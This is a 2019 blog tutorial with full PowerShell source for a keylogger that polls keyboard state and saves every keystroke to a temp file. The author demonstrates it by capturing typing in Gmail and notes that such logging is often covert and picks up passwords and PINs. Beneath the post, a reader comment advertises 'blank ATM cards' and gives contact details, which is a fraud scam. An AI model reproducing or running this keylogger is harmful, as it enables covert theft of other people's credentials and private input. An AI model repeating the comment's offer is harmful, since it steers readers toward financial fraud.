Monday, February 25, 2019


How to create a simple keylogger yourself in windows: – Keylogging is the process of recording the key presses made on a keyboard on to a log. This is often done without the awareness of the user. Keylogging is widely used as a hacking trick as well. Using keylogging, all the keypresses made on a keyboard can be efficiently recorded. This can include passwords, usernames, secret pins, confidential data etc. Keylogging can be used to detect trespassing as well. In this article, a windows framework known as Powershell is used to create a simple keylogger. It consists of a command-line shell and associated scripting language. Powershell is built on the .NET framework and is used widely for various applications.
STEP 1
  • Spread out the Start menu. Type in Windows PowerShell in the search bar. From the search results, open the applications Windows PowerShell and Windows PowerShell ISE as shown in the screenshot.
1search
STEP 2
  • Click on Windows PowerShell icon in the task bar. This will result in the popping up of Windows PowerShell command prompt.
2powerShell
STEP 3
  • Copy the code given below and paste it onto the Windows PowerShell command prompt. To copy or paste, you just need to select the code and right click, in the PowerShell command prompt.
    #requires -Version 2
    function Start-KeyLogger($Path="$env:temp\keylogger.txt") 
    {
      # Signatures for API Calls
      $signatures = @'
    [DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)] 
    public static extern short GetAsyncKeyState(int virtualKeyCode); 
    [DllImport("user32.dll", CharSet=CharSet.Auto)]
    public static extern int GetKeyboardState(byte[] keystate);
    [DllImport("user32.dll", CharSet=CharSet.Auto)]
    public static extern int MapVirtualKey(uint uCode, int uMapType);
    [DllImport("user32.dll", CharSet=CharSet.Auto)]
    public static extern int ToUnicode(uint wVirtKey, uint wScanCode, byte[] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags);
    '@
    
      # load signatures and make members available
      $API = Add-Type -MemberDefinition $signatures -Name 'Win32' -Namespace API -PassThru
        
      # create output file
      $null = New-Item -Path $Path -ItemType File -Force
    
      try
      {
        Write-Host 'Recording key presses. Press CTRL+C to see results.' -ForegroundColor Red
    
        # create endless loop. When user presses CTRL+C, finally-block
        # executes and shows the collected key presses
        while ($true) {
          Start-Sleep -Milliseconds 40
          
          # scan all ASCII codes above 8
          for ($ascii = 9; $ascii -le 254; $ascii++) {
            # get current key state
            $state = $API::GetAsyncKeyState($ascii)
    
            # is key pressed?
            if ($state -eq -32767) {
              $null = [console]::CapsLock
    
              # translate scan code to real code
              $virtualKey = $API::MapVirtualKey($ascii, 3)
    
              # get keyboard state for virtual keys
              $kbstate = New-Object Byte[] 256
              $checkkbstate = $API::GetKeyboardState($kbstate)
    
              # prepare a StringBuilder to receive input key
              $mychar = New-Object -TypeName System.Text.StringBuilder
    
              # translate virtual key
              $success = $API::ToUnicode($ascii, $virtualKey, $kbstate, $mychar, $mychar.Capacity, 0)
    
              if ($success) 
              {
                # add key to logger file
                [System.IO.File]::AppendAllText($Path, $mychar, [System.Text.Encoding]::Unicode) 
              }
            }
          }
        }
      }
      finally
      {
        # open logger file in Notepad
        notepad $Path
      }
    }
    
    # records all key presses until script is aborted by pressing CTRL+C
    # will then open the file with collected key codes
    Start-KeyLogger
    
STEP 4
  • Now the Windows PowerShell will look like the following screenshot.
3copyCode
STEP 5
  • Now open some application and press some keys. I have opened G-Mail as an example.

STEP 6
  • Once you are done with pressing keys, look at the bottom of the code in the Windows PowerShell command prompt. There you will see an instruction Recording key presses. Press CTRL+C to see results. Press CTRL+Cas per the instruction to see the logged keystrokes.
STEP 7
  • Pressing CTRL+C will result in the opening of a notepad file, which has the recorded keystrokes.
5notepad
STEP 8
  • Alternatively, you can open the Windows PowerShell ISE as shown in the first step and copy the code. As next, click on the Play icon to run the script. This will also give the same result.
6PowerShellISE

1 comment:

  1. I am a Single full time dad on disability getting no help from their moms. It a struggle every day. My boys are 15 and 9 been doing this by myself for 8 years now it’s completely drained all my savings everything . These guys are the present day ROBIN HOOD. Im back on my feet again and my kids can have a better life all thanks to the blank card i acquired from skylink technology. Now i can withdraw up too 3000 per day Contact them as well on Mail: skylinktechnes@yahoo.com   or   whatsspp/telegram: +1(213)785-1553

    ReplyDelete